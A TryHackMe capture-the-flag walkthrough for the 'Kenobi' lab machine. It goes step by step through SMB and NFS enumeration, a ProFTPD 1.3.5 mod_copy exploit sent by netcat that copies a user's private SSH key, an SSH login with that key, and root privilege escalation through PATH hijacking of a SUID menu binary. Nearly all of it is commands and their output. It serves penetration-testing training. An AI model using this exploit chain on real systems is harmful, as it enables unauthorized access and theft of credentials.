Kenobi TryHackMe Walkthrough
Challenge Link: https://tryhackme.com/room/kenobi
Scanning
First, we will start the network scanning by running a port scan using nmap, looking for open ports and default scripts.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -sC -sV -oN nmap/initial 10.10.209.89
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 18:34 IST
Nmap scan report for 10.10.209.89
Host is up (0.17s latency).
Not shown: 993 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD 1.3.5
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA)
| 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA)
|_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
| http-robots.txt: 1 disallowed entry
|_/admin.html
|_http-title: Site doesn't have a title (text/html).
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 2,3,4 2049/tcp nfs
| 100003 2,3,4 2049/tcp6 nfs
| 100003 2,3,4 2049/udp nfs
| 100003 2,3,4 2049/udp6 nfs
| 100005 1,2,3 38636/udp6 mountd
| 100005 1,2,3 42497/udp mountd
| 100005 1,2,3 48661/tcp6 mountd
| 100005 1,2,3 51959/tcp mountd
| 100021 1,3,4 39973/tcp nlockmgr
| 100021 1,3,4 40817/udp nlockmgr
| 100021 1,3,4 43839/tcp6 nlockmgr
| 100021 1,3,4 47091/udp6 nlockmgr
| 100227 2,3 2049/tcp nfs_acl
| 100227 2,3 2049/tcp6 nfs_acl
| 100227 2,3 2049/udp nfs_acl
|_ 100227 2,3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
2049/tcp open nfs_acl 2-3 (RPC #100227)
Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
We have many ports open. We have FTP running on port 21, SSH on port 22, Apache HTTP web server on port 80, RPC on port 111, 2049 and SMB on port 445.
Initial Enumeration
We will first start enumerating the SMB service. To list all the shares, we will use the smbclient command along with the IP address of the machine and leave the password field blank.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient -L 10.10.209.89
Enter WORKGROUP\madhav's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk
IPC$ IPC IPC Service (kenobi server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
We have a SMB share named anonymous. After connecting to the anonymous share, you will find a file named log.txt. We can download it using the commands shown below.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ smbclient //10.10.209.89/anonymous
Enter WORKGROUP\madhav's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Sep 4 16:19:09 2019
.. D 0 Wed Sep 4 16:26:07 2019
log.txt N 12237 Wed Sep 4 16:19:09 2019
9204224 blocks of size 1024. 6877100 blocks available
smb: \> get log.txt
getting file \log.txt of size 12237 as log.txt (17.4 KiloBytes/sec) (average 17.4 KiloBytes/sec)
smb: \> exit
Inside the log.txt, there are configs of different services installed in the system. Here we find that there is a user named kenobi and it also has its private SSH key stored in its /home/kenobi/.ssh
folder.
We also have a NFS server and when we run a nmap scan with nfs scripts, we find that we can mount /var
directory from the machine.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount 10.10.209.89
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-06 19:43 IST
Nmap scan report for 10.10.209.89
Host is up (0.18s latency).
PORT STATE SERVICE
111/tcp open rpcbind
| nfs-showmount:
|_ /var *
Nmap done: 1 IP address (1 host up) scanned in 2.04 seconds
Gaining Access
Next we further move our enumeration to FTP. We have ProFTPD 1.3.5 running on port 21 but we do have the creds or anonymous login enabled to access the server.
If we search ProFTPD 1.3.5 on exploitdb, we get few exploits. There is a File Copy exploit which allows us to copy files via FTP.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ searchsploit ProFTPD 1.3.5
---------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------- ---------------------------------
ProFTPd 1.3.5 - 'mod_copy' Command Execution | linux/remote/37262.rb
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/36803.py
ProFTPd 1.3.5 - 'mod_copy' Remote Command Exe | linux/remote/49908.py
ProFTPd 1.3.5 - File Copy | linux/remote/36742.txt
---------------------------------------------- ---------------------------------
Shellcodes: No Results
To exploit the service, we need to connect to FTP and then we can use CPFR and CPTO commands to copy /home/kenobi/.ssh/id_rsa
to /var/tmp
, which we can mount to our system using NFS.
So let's connect to the FTP service using netcat and then copy the private SSH key.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ nc 10.10.209.89 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) [10.10.209.89]
SITE CPFR /home/kenobi/.ssh/id_rsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/id_rsa
250 Copy successful
The exploit worked successfully, now we can mount /var
directory into our kali machine.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ mkdir /tmp/kenobiNFS
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ sudo mount 10.10.209.89:/var /tmp/kenobiNFS
Now we can copy the id_rsa
from /tmp/kenobiNFS
directory and then login as user kenobi via SSH.
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ cp /tmp/kenobiNFS/tmp/id_rsa .
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ chmod 600 id_rsa
┌──(madhav㉿kali)-[~/ctf/thm/kenobi]
└─$ ssh -i id_rsa kenobi@10.10.209.89
The authenticity of host '10.10.209.89 (10.10.209.89)' can't be established.
ED25519 key fingerprint is SHA256:GXu1mgqL0Wk2ZHPmEUVIS0hvusx4hk33iTcwNKPktFw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.209.89' (ED25519) to the list of known hosts.
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.8.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
103 packages can be updated.
65 updates are security updates.
Last login: Wed Sep 4 07:10:15 2019 from 192.168.1.147
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
kenobi@kenobi:~$ id
uid=1000(kenobi) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
kenobi@kenobi:~$
We can now read the user flag present in the home directory of user kenobi.
kenobi@kenobi:~$ ls
share user.txt
kenobi@kenobi:~$ cat user.txt
REDACTED
Privilege Escalation
Now that we have a shell on the system as user kenobi, we need to find a way to escalate our privileges to user root. For this, we can search for existing SUIDs using the following command:
find / -type f -perm -u=s 2>/dev/null
We have a binary /usr/bin/menu
which has SUID permissions. When we run the binary, it prints a menu which can be used to perform different actions.
This binary is directly passing the commands into the shell. We can confirm this by using the strings command.
To exploit this binary, we will create a vulnerable version of ifconfig
so that when the binary will execute ifconfig, our vulnerable version of ifconfig gets executed. This technique is called path variable manipulation.
kenobi@kenobi:~$ cd /tmp
kenobi@kenobi:/tmp$ echo /bin/bash > ifconfig
kenobi@kenobi:/tmp$ chmod 777 ifconfig
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
***************************************
1. status check
2. kernel version
3. ifconfig
** Enter your choice :3
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.
root@kenobi:/tmp# id
uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)
Hurray, we are root! Now we can read our root flag present in the /root
directory.
root@kenobi:/tmp# cd /root/
root@kenobi:/root# ls
root.txt
root@kenobi:/root# cat root.txt
REDACTED
That’s it! Thanks for reading. Stay tuned for similar walkthroughs and much more coming up in the near future!
NOTE: The awesome artwork used in this article was created by Letixmix.